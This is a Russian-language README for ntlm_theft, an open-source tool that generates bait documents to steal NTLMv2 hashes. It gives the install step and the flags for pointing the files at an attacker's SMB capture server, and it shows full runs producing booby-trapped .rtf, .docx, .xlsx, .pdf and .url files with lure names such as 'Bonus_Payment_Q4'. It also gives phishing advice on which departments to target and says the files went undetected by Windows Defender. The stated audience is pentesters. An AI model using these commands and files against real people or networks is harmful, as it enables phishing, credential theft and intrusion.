
Инструмент для генерации файлов кражи хешей NTLMv2 различных типов от Джейкоба Уилкина (Greenwolf)
Инструмент для создания различных типов файлов, похищающих NTLMv2-хеши.
ntlm_theft — это инструмент с открытым исходным кодом на Python3, который генерирует 21 различный тип документов для кражи хешей. Эти документы можно использовать для фишинга, если цель разрешает SMB-трафик за пределами своей сети, или если вы уже находитесь внутри внутренней сети.
Преимущество этих типов файлов по сравнению, скажем, с документами на основе макросов или эксплойтов заключается в том, что все они построены с использованием «предусмотренной функциональности». Ни один из них не был обнаружен Защитником Windows в июне 2020 года, и 17 из 21 атаки сработали на полностью пропатченном хосте Windows 10.
ntlm_theft поддерживает следующие типы атак:
ntlm_theft в первую очередь предназначен для пентестеров и участников Red Team, которые будут использовать его для внутреннего фишинга на сотрудников целевой компании или для массового тестирования антивирусов и почтовых шлюзов. Он также может использоваться для внешнего фишинга, если на периметральном межсетевом экране разрешен исходящий SMB-доступ.
Я обнаружил, что это полезно во время пентеста, чтобы легко увидеть, какие типы файлов у меня есть, вместо того чтобы тратить время на настройку конкретной атаки, как это делается на заданиях Red Team. Вы можете отправить .rtf или .docx файл в отдел кадров, а .xlsx документ — в финансовый отдел.
Эти инструкции покажут вам, что требуется для использования ntlm_theft и как его использовать.
ntlm_theft требует Python3 и xlsxwriter:
pip3 install xlsxwriter
Для запуска инструмента необходимо указать 4 параметра: формат входных данных, входной файл или папку и базовый режим работы:
-g, --generate : Выберите, генерировать все файлы или конкретный тип файла
-s, --server : IP-адрес вашего сервера захвата SMB-хешей (Responder, impacket ntlmrelayx, Metasploit auxiliary/server/capture/smb и т. д.)
-f, --filename : Базовое имя файла без расширения, можно переименовать позже (например: test, Board-Meeting2020, Bonus_Payment_Q4)
Вот пример запуска с генерацией всех файлов:
# python3 ntlm_theft.py -g all -s 127.0.0.1 -f test
Created: test/test.scf (BROWSE)
Created: test/test-(url).url (BROWSE)
Created: test/test-(icon).url (BROWSE)
Created: test/test.rtf (OPEN)
Created: test/test-(stylesheet).xml (OPEN)
Created: test/test-(fulldocx).xml (OPEN)
Created: test/test.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: test/test-(includepicture).docx (OPEN)
Created: test/test-(remotetemplate).docx (OPEN)
Created: test/test-(frameset).docx (OPEN)
Created: test/test.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
Created: test/test.asx (OPEN)
Created: test/test.jnlp (OPEN)
Created: test/test.application (DOWNLOAD AND OPEN)
Created: test/test.pdf (OPEN AND ALLOW)
Created: test/zoom-attack-instructions.txt (PASTE TO CHAT)
Generation Complete.

Вот пример запуска с генерацией только современных файлов:
# python3 ntlm_theft.py -g modern -s 127.0.0.1 -f meeting
Skipping SCF as it does not work on modern Windows
Created: meeting/meeting-(url).url (BROWSE TO FOLDER)
Created: meeting/meeting-(icon).url (BROWSE TO FOLDER)
Created: meeting/meeting.rtf (OPEN)
Created: meeting/meeting-(stylesheet).xml (OPEN)
Created: meeting/meeting-(fulldocx).xml (OPEN)
Created: meeting/meeting.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: meeting/meeting-(includepicture).docx (OPEN)
Created: meeting/meeting-(remotetemplate).docx (OPEN)
Created: meeting/meeting-(frameset).docx (OPEN)
Created: meeting/meeting-(externalcell).xlsx (OPEN)
Created: meeting/meeting.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
Created: meeting/meeting.asx (OPEN)
Created: meeting/meeting.jnlp (OPEN)
Created: meeting/meeting.application (DOWNLOAD AND OPEN)
Created: meeting/meeting.pdf (OPEN AND ALLOW)
Skipping zoom as it does not work on the latest versions
Skipping Autorun.inf as it does not work on modern Windows
Skipping desktop.ini as it does not work on modern Windows
Generation Complete.
Вот пример запуска с генерацией только xlsx файла:
# python3 ntlm_theft.py -g xlsx -s 192.168.1.103 -f Bonus_Payment_Q4
Created: Bonus_Payment_Q4/Bonus_Payment_Q4-(externalcell).xlsx (OPEN)
Generation Complete.
ntlm_theft Создано Jacob Wilkin Copyright (C) 2020 Jacob Wilkin
Эта программа является свободным программным обеспечением: вы можете распространять и/или изменять ее в соответствии с условиями Стандартной общественной лицензии GNU, опубликованной Фондом свободного программного обеспечения, версии 3 или (по вашему выбору) любой более поздней версии.
Эта программа распространяется в надежде, что она будет полезной, но БЕЗ КАКИХ-ЛИБО ГАРАНТИЙ; даже без подразумеваемых гарантий ТОВАРНОЙ ПРИГОДНОСТИ или ПРИГОДНОСТИ ДЛЯ ОПРЕДЕЛЕННОЙ ЦЕЛИ. Подробнее см. в Стандартной общественной лицензии GNU.